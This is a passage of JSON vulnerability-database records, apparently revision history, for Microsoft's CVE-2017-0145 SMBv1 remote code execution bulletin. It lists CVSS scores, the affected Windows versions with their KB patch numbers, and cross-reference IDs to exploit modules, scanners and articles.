{"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems 
Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 
x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T20:47:14", "differentElements": ["msAffectedSoftware"], "edition": 35}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-11T22:53:48", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": 
["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T22:53:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T22:53:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012212", "KB3210720", "KB4012606", "KB4012217", "KB3212646", "KB4012216", "KB4012214", "KBMS16-110, 3187754", "KB3213986", "KB4012598", "KB3205401", "KB3177186", "KB4014077", "KB3210721", "KB4012213", "KB4012215", "KB3205409", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": 
"", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", 
"kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T22:53:48", "differentElements": ["msAffectedSoftware"], "edition": 36}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "4b3c58a0de4c835f521b07a7a1b9b647", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-12T04:44:31", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", 
"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T22:53:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-11T22:53:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3177186", "KB4013429", "KB3210721", "KB4012606", "KBMS16-110, 3187754", "KB4012214", "KB4012212", "KB3213986", "KB3205401", "KB4012213", "KB3212646", "KB3210720", "KB4012215", "KB4012217", "KB3205409", "KB4014077", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": 
"KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems 
Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 
